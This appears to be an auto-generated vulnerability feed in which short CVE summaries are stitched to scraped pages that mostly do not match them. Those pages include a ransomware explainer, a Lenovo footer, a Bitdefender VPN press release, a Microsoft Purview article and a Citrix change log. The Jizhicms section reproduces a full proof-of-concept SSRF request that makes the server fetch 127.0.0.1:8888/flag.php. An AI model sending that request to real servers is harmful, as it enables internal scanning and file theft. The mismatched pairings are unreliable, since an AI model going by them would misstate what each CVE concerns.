Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload.

CVE-2021-36895: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

By Waqas
Learn everything there is to know about ransomware attacks. We cover the definition, statistics, and ransomware protection. Even…
This is a post from HackRead.com Read the original post: Ransomware Attacks: Everything You Need to Know

****Learn everything there is to know about ransomware attacks. We cover the definition, statistics, and ransomware protection.****

Even though it ends with a ransom, ransomware attacks are a bit different from regular ransom attacks that leverage sensitive information. They include malware that attacks devices, and the ransom is mostly demanded in hackers’ preferred cryptocurrency.

What is a ransomware attack exactly, how common are ransomware attacks, how does ransomware find its way to your computer, and do you have ransomware protection? Let’s dive in and find out.

**What is a Ransomware Attack? **

Ransomware is a type of malicious software. This malware can get into your computer, encrypt data, and withhold it until you pay the ransom. Data that is unlocked until a ransom is paid can be that of a single device or an entire network.

The victim of a ransomware attack, be it a company or an individual, has a certain time frame during which they have to pay the ransom or do what the note says. If they don’t oblige, they risk losing access to their data forever.

After the victim pays the ransom in the demanded cryptocurrency (that is used for illegal cyber activities because it’s more difficult to trace it), hackers unlock the access to their data. 

Or do they?

**Should You Pay the Ransom? **

No. You should contact authorities in your area that can take over, such as the FBI. 

Why?

Paying the ransom could imply you’re financing criminal activity.

So, why do most people pay the ransom?

When it comes to ransomware, there is a high chance you’ll lose your data. For companies, this means that they might have to rebuild everything they’ve worked for from scratch. 

Most companies don’t want their clients to find out about the attack at all. They might risk their reputation if others find out about the hacking, and their customers might be reluctant to use their services again in the future. 

Ransomware attacks also disrupt the workflow of an organization. As hackers withhold data, organizations might not be able to work or lose a lot of time waiting for access to the stolen information. 

Also, their IT teams and cybersecurity experts have to spend their time mitigating and dealing with the aftermath of a ransomware attack. This might cause them to fall behind with the rest of their professional duties.

Those are some of the reasons why most companies pay the price of a ransom. However, if you do pay the ransom, this doesn’t guarantee that hackers will give you access to your system or that the attack won’t happen again.

**Ransomware Attack Statistics**

According to research, 10% of breaches include ransomware. Targets of ransomware attacks have been individuals, companies, and even critical infrastructure sectors. 

The Colonial Pipeline ransomware attacks that happened last year saw one of the most widely reported attacks that targeted critical infrastructure. However, CISA suggests that there have been attacks on 14 out of 16 critical infrastructures.

CISA’s overall conclusion has been that there has been an increase in ransomware attacks worldwide. 

Last year, the number of ransom attacks doubled. The FBI reported an astonishing 2,084 complaints about ransomware.

An increase in this type of cyberattack in recent years could be attributed to widespread access to hacking methods and new vulnerabilities that have been caused by remote work. 

Information about how to perform certain attacks has been available on the internet. This means that even inexperienced cyber criminals can follow directions and perform dangerous attacks.

To adapt to remote work, companies had to adjust their systems to allow remote access. As they haven’t used the systems before, they were left with flaws in the system that caused many cyber breaches at the start of the pandemic. 

**Ransomware Attack Starts with Access to Your Device**

Some ways that ransomware malware can find its way to your computer include: 

*   **Email phishing** — if you click the link in the body of an email from an unknown sender or download a virus with the attachment
*   **Adware** — ads on the internet can contain malware and if you click it, you can download it onto your computer
*   **High-risk website** — by visiting an unsafe website, you can download malware on your device that encrypts your data

**Can You Protect Yourself from Ransomware Attacks? **

Yes. Since it’s a kind of malware, ransomware protection tools mitigate this type of attack as with any malicious virus that finds its way to your computer. They scan, detect, and remove it before it causes further damage. 

Some things you can do to protect your devices from ransomware attacks are:  

*   **Updating your software** — outdated software, applications, or systems can create vulnerabilities for your systems and devices.
*   **Having trustworthy anti-malware on your computer** — antivirus software that can detect ransomware and other types of malware is important for your cybersecurity. 
*   **Doing regular backups of your data** — during malware attacks, the key leverage that hackers have over you is withholding the data.

Old versions of applications and software can create flaws in your system because attacks are always changing, and new updated versions of systems are ready for new hacking methods.

Backups of your data should be on an external hard drive so that you can access it even if you become a victim of a ransomware attack.

**Prevent Ransomware Attacks Before They Happen**

Most people think about ransomware when the attack has already happened. Their data is encrypted, and they’re thinking of paying the ransom to regain access to their information.

Paying the ransom also doesn’t guarantee that you won’t be the victim of this type of cybercrime ever again. 

If it’s not patched up after the attack, the same hackers can exploit those same flaws that they’ve found in your system to demand ransom.

The time and money that companies spend following the attacks can be a deathly blow for many businesses — especially if they’re small businesses that didn’t expect that they’ll be the victim of such an attack. 

**More Ransomware Topics**

1.  Android ransomware found extorting credit card details from users
2.  NetWalker ransomware gang member sentenced to 7 years in prison
3.  New Android ransomware uses pornographic posts to infect devices
4.  How To Prevent Growing Issue of Encryption Based Malware (Ransomware)
5.  52 Critical Infrastructure Orgs Hit by Ragnar Locker Ransomware Gang – FBI

Ransomware Attacks: Everything You Need to Know

Jizhicms v1.9.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via /admin.php/Plugins/update.html.

Thank you for your letter ! The Version 2.0 supports changing the plug-in address. If you want the system to download a file, you can forge an address and add your special file. You can download it directly without such complexity. The plug-in module itself has permission control. If you do not have background permission, you will not be able to download plug-ins. Thank you again for your suggestions, but I'm sorry that the plug-in function model does not require downloading the specified files, but wants to download any files that the administrator wants to download. This is the original intention of my plug-in design. Keeping the administrator account well will be everyone's responsibility. If you lose the background account, you will lose everything.

…

\------------------&nbsp;原始邮件&nbsp;------------------ 发件人: "Cherry-toto/jizhicms" \*\*\*@\*\*\*.\*\*\*&gt;; 发送时间:&nbsp;2022年3月18日(星期五) 晚上9:33 \*\*\*@\*\*\*.\*\*\*&gt;; \*\*\*@\*\*\*.\*\*\*&gt;; 主题:&nbsp;\[Cherry-toto/jizhicms\] V1.9.5: SSRF Vulnerability (Issue #67) SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks The vulnerability is located in the background plug-in download function I start a locally accessible Web service with a flag.php file 使用payload POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.48.135 Content-Length: 93 Accept: application/json, text/javascript, \*/\*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.48.135 Referer: http://192.168.48.135//admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=821f3d50fa8cd84139c76be9 Connection: close action=start-download&amp;filepath=mutisite&amp;download\_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php See the response Browser accesshttp://192.168.48.135/cache/update\_mutisite.zip open by notepad As with flag.php, this was read successfully — Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android. You are receiving this because you are subscribed to this thread.Message ID: \*\*\*@\*\*\*.\*\*\*&gt;

CVE-2022-27429: V1.9.5: SSRF Vulnerability · Issue #67 · Cherry-toto/jizhicms

Versions of Motorola Ready For and Motorola Device Help Android applications prior to 2021-04-08 do not properly verify the server certificate which could lead to the communication channel being accessible by an attacker.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Sales Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | |

CVE-2021-3898: Motorola Android App Vulnerabilities - Lenovo Support DE

New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private Web browsing.

BUCHAREST, Romania and SANTA CLARA, Calif., April 21, 2022 -- Bitdefender, a global cybersecurity leader, today announced new enhancements to its Bitdefender Premium Virtual Private Network (VPN) Service designed to bolster privacy, identity protection and security for consumers. New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private web browsing from anywhere in the world using a computer or mobile device. It is simple to set up and comes with an intuitive interface for any level user.

Cybersecurity and data privacy are converging as consumers grow increasingly concerned about who has access to their personally identifiable information, as well as data collected about their online activities and how that data is sold, traded and used. Even when consumers use so-called "Private Browsing" or "Incognito" modes on major web browsers, internet service providers (ISPs), wireless hotspots and websites often still collect information about their browsing history and online behavior.

Data tracking, spyware and other malicious threats are still a reality on open public Wi-Fi networks. According to Firefox telemetry, about 80 percent of web traffic globally is encrypted. Additionally, a study found that about six percent of the top 10,000 websites secured by HTTPS had TLS protocol security flaws.

Recent Bitdefender research revealed that most consumers are highly exposed to risk, with the majority (61 percent) not using VPN services and anti-trackers, ad blockers (44 percent) or privacy software of any type (64 percent) on the personal devices they use most for online activities.

"It has become increasingly difficult for consumers to maintain privacy and keep their data secure as they conduct their digital lives online," said Ciprian Istrate, vice president, Bitdefender Consumer Solutions. "We incorporated ad blocking and anti-tracking capabilities to Bitdefender Premium VPN to deliver both solid protection and anonymity as users enjoy favorite online activities without concern their online behaviors are being tracked or personal data collected and sold either legally or illegally."

**Bitdefender Premium VPN Key Features**

*   **Powerful Encryption for All Web Traffic** \-- Securely encrypt all incoming and outgoing web traffic for Windows, Mac, Android and iOS devices leveraging over 4,000 Bitdefender VPN servers across 49 countries. Keep online identities and activities safe from hackers, ISPs and others for safe online streaming and downloads, with no traffic logs.
*   **Built-In Ad Blocker for Better Browsing Experience** \-- Native ad blocker module removes ads, banners, pop-ups and video ads from websites for a better browsing experience. Blocking intrusive ads reduces the risk of adware and malware, and helps users save bandwidth while reclaiming the entire screen for relevant content only.
*   **Prevent Online Profiling With Anti-Tracker --** Block advertisers, websites and other third-parties from collecting data such as device type, location, web queries, shopping preferences and more. Preventing the collection of such data not only protects consumer privacy, it can speed performance of users' devices.
*   **Achieve System-Wide Protection --** As opposed to web browser extensions that only offer privacy within that browser, Bitdefender VPN Premium blocks disrupting ads and tracking modules across the user's entire device without slowing down systems or leaving gaps in defense.
*   **Whitelist Trusted Websites --** Easily make exceptions to ad blocking and anti-tracking features as desired, by adding the URLs of specific, trusted domains to a whitelist. This enables VPN users to ensure secure, encrypted browsing while accessing websites that might otherwise not load properly when tracking codes are blocked.

**Availability**

Bitdefender Premium VPN is available for Windows, macOS, Android and iOS devices. New ad blocker, anti-tracker and whitelist capabilities are now available to all users, including free and trial customers. For more information or to purchase Bitdefender Premium VPN visit https://www.bitdefender.com/solutions/vpn.html.

**About Bitdefender**

Bitdefender provides cybersecurity solutions with leading security efficacy, performance and ease of use to small and medium businesses, mid-market enterprises and consumers. Guided by a vision to be the world's most trusted cybersecurity solutions provider, Bitdefender is committed to defending organizations and individuals around the globe against cyberattacks to transform and improve their digital experience. For more information, visit https://www.bitdefender.com.

Bitdefender Enhances Premium VPN Service With New Privacy Protection Technologies

ASUS WebStorage has a hardcoded API Token in the APP source code. An unauthenticated remote attacker can use this token to establish connections with the server and carry out login attempts to general user accounts. A successful login to a general user account allows the attacker to access, modify or delete this user account information.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202203005

CVE ID

CVE-2022-26672

CVSS

7.3 (High)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

影響產品

ASUS WebStorage Android version <= 3.10.1

問題描述

ASUS WebStorage之API Token以明文方式Hard-code於APP原始碼中，導致遠端攻擊者不須權限，即可利用該Token建立連線，針對一般使用者，進行嘗試登入攻擊行為，如果成功可取得該使用者權限，藉以查看、修改與刪除個人資訊。

解決方法

ASUS WebStorage Android version >= 3.10.2

漏洞通報者

丁韋智

公開日期

2022-04-22

CVE-2022-26672: ASUS WebStorage - Use of Hard-coded Credentials

Three security vulnerabilities have been disclosed in the audio decoders of Qualcomm and MediaTek chips that, if left unresolved, could allow an adversary to remotely gain access to media and audio conversations from affected mobile devices.
According to Israeli cybersecurity company Check Point, the issues could be used as a launchpad to carry out remote code execution (RCE) attacks simply by

Critical Chipset Bugs Open Millions of Android Devices to Remote Spying

The rebranded Microsoft Purview platform integrates Microsoft 365 Compliance and Azure Purview, and adds new capabilities and products to help manage data no matter where it resides.

The shift to a hybrid workplace has forced organizations to rapidly adopt cloud technologies and remote access tools to enable ubiquitous connectivity.

That in turn has generated more data than ever before, and organizations are faced with the prospect of securing their data, managing data governance, and keeping up with compliance requirements. Collaboration tools can result in sensitive data leaks if not properly managed. Microsoft announced changes in its data governance platform to help customers see their assets across their entire data estate, along with helping to manage risks and regulatory compliance.

Microsoft has rebranded Azure Purview, which became generally available last fall, to Microsoft Purview and brought over the products that used to make up Microsoft 365 Compliance. Microsoft Purview also features new functionality in Microsoft Purview eDiscovery to improve identification of data stored in Teams; the general availability of Microsoft Purview Data Loss Prevention for macOS; and a preview of the ability to create encrypted documents for iOS and Android platforms.

Microsoft Purview will bring "that chief data officer and their team together with the risk officer, the compliance officer, and \[have\] a unified view and ability to manage data," says Alym Rayani, general manager of compliance and privacy at Microsoft.

For organizations, getting a sense of what data they have is a growing challenge, as is making sure the data isn’t leaving the organization in an unauthorized manner. Data has become the "lifeblood" of how businesses operate, says Rayani, but knowing what the organization has, or where it is even stored, is a growing challenge. The rapid adoption of cloud applications and remote access tool have expanded the data estate. An example would be how more employees are exchanging data using Microsoft Teams — not just in the chat or conversations, but also sharing files.

"Data lives everywhere. There's a lot of it," Rayani says, noting that about 93% of customers told Microsoft they store data across multiple clouds and multiple solutions.

**Understanding the Data**  
Before organizations can do anything about their data, they have to first understand it. Toward that goal, Microsoft expanded its sensitive information type catalog with more than 50 new classifiers, such as those covering patient and healthcare data. There were already 250 classifiers, for data elements such as credit card and Social Security numbers, Rayani says. These classifiers are available for DLP, Information Protection (auto-labeling), Data Lifecycle Management, Insider Risk Management, Records Management, eDiscovery, and Microsoft Priva.

The classifiers are necessary to identify sensitive data, and to allow organizations to create policies that accommodate the specific requirements for each type. There may be patient records that are considered confidential even if payment card numbers or Social Security numbers are not included.

"One of the things we've been hearing from customers is, 'Hey, I need to get a good understanding of my data environment, my data landscape. It lives across a range of systems. It lives in apps. It lives in different platforms,'" Rayani says.

**Governance to the Forefront**  
Microsoft Purview is not just about visibility or classifying data, but can give organizations governance tools that extend all across the data environment. Data leak prevention is one example, but another important area of data governance is insider risk management, Rayani says. While the idea of a malicious insider — the person trying to steal confidential information and intellectual property — is a classic example of insider threat, there is also a lot of the "inadvertent" insider — the one who accidentally exposes data while trying to do their job.

For example, a marketing employee trying to share something over Teams may violate data leak prevention policy. With Microsoft Purview, organizations have tools to warn the user in the moment that there is a policy violation, block the action, and offer an alternative method, such as a secure SharePoint site, Rayani says.

  

    

How each of the products in the Microsoft Purview family are branded. Source: Microsoft

Organizations frequently have to stitch together multiple products to give security, governance, compliance, and legal teams a clear view of what is happening in their environment. Almost 80% of IT decision-makers in the United States purchased multiple products to do so, and a majority had purchased three or more, according to a recent Microsoft survey. This patchwork of products can expose infrastructure gaps and is both costly and complex to manage, Jessica Hawk, Microsoft's corporate vice president of data, AI and mixed reality, wrote on the Azure blog. Microsoft Purview's goal is to provide a unified view to improve security, privacy, and compliance, she wrote.

The company will continue strengthening the integration between Azure products and Microsoft 365, as well as adding new capabilities. For example, sensitivity labels — which designate the data classification — will be consistent across products, and they will be viewable in both Microsoft Purview's compliance portal (formerly Microsoft 365 Compliance) and governance portal (Azure Purview).

"We believe the new way to optimize your data strategy is to deliver a unified view of data in the organization across hybrid, multicloud environments by bringing together the business users of data with the protectors of data," Hawk wrote.

Microsoft Launches Purview Platform to Govern, Protect, and Manage Sensitive Data

In Citrix XenMobile Server through 10.12 RP9, there is an Authenticated Directory Traversal vulnerability, leading to remote code execution.

The following table describes important changes to the XenMobile Server product documentation. To receive notifications about these updates, subscribe to the RSS feed.

Date

Change

Description

15 Sep 2021

Updated articles for the XenMobile Server 10.14 release

For a summary of new and changed features, see What’s new in XenMobile Server 10.14.

27 Apr 2021

Updated description of the Locate security action

See Security actions.

23 Apr 2021

Added an action example

See Automated actions.

01 Apr 2021

Added description of per-app VPN requirements

See VPN device policy.

24 Feb 2021

Added announcment about preparation needed before upgrading endpoints to iOS 14.5

See Before upgrading endpoints to iOS 14.5.

17 Dec 2020

New device policy for controlling how installed managed apps get updated on Android Enterprise

See Automatically update managed apps device policy

18 Nov 2020

Added a workaround for a single sign-on issue related to on-premises Citrix ADC

See Before you upgrade an on-premises Citrix ADC.

26 Oct 2020

Updated articles for the XenMobile Server 10.13 release

For a summary of new and changed features, see What’s new in XenMobile Server 10.13.

02 Jul 2020

Added a timeline and action plan for the deprecation of MDX encryption

See Prepare your Android devices for upcoming changes.

19 Jun 2020

Addressed the terms “blacklist” and “whitelist” in the documentation. Changed to “block list” and “allow list”.

The Endpoint Management console currently includes the terms “blacklist” and “whitelist”. We updated the documentation. We are in the process of changing the terms in the product console for an upcoming release.

04 May 2020

Added a note about new TLS certificate requirements for trusted certificates in iOS, iPadOS, and macOS.

See Certificates.

18 Feb 2020

Updated terminology

Throughout the documentation, updated the NetScaler, NetScaler Gateway, ShareFile, and StorageZones Controller terminology. Some console components might still show the older names.

06 Feb 2020

Updated articles for the XenMobile Server 10.12 release

For a summary of new and changed features, see What’s new in XenMobile Server 10.12.

06 Nov 2019

Added a section about migrating from Apple VPP to ABM or ASM

See Apple Volume Purchase Program migration to Apple Business Manager (ABM) and Apple School Manager (ASM).

04 Sep 2019

Updated articles for the XenMobile Server 10.11 release

For a summary of new and changed features, see What’s new in XenMobile Server 10.11.

15 May 2019

Updated iOS device enrollment section

Added video and updated steps for iOS 12 device enrollment. See Enroll iOS devices.

10 May 2019

New section about Entrust PKI

Added section to the “PKI Entities” article: PKI Entities.

03 Apr 2019

New section for Apple DEP renewal steps

Added section to “Deploy devices through Apple DEP”: Renew your enrollment in the Apple Deployment Program.

02 Apr 2019

Updated articles for the Gateway connector for Exchange ActiveSync 8.5.3 release

For a summary of new and changed features, see What’s new in version 8.5.3.

26 Mar 2019

Updated Secure Hub store name syntax

Added note about the alphanumeric requirement for Store name in App store and Citrix Secure Hub branding.

06 Mar 2019

Updated articles for the Endpoint Management connector for Exchange ActiveSync 10.1.9 release

For a summary of new and changed features, see What’s new in version 10.1.9.

01 Feb 2019

Updated articles for the Endpoint Management connector for Exchange ActiveSync 10.1.8 release

For a summary of new and changed features, see What’s new in version 10.1.8.

23 Jan 2019

Updated Secure Browse terminology

Throughout the documentation, renamed the MDX setting “Secure Browse” to “Tunneled Web SSO”. For information, see App Network Access for iOS and App Network Access for Android.

CVE-2021-44519: Citrix XenMobile Server Document History

Zoho ManageEngine ADSelfService Plus before 6121, ADAuditPlus 7060, Exchange Reporter Plus 5701, and ADManagerPlus 7131 allow NTLM Hash disclosure during certain storage-path configuration steps.

Tag

#android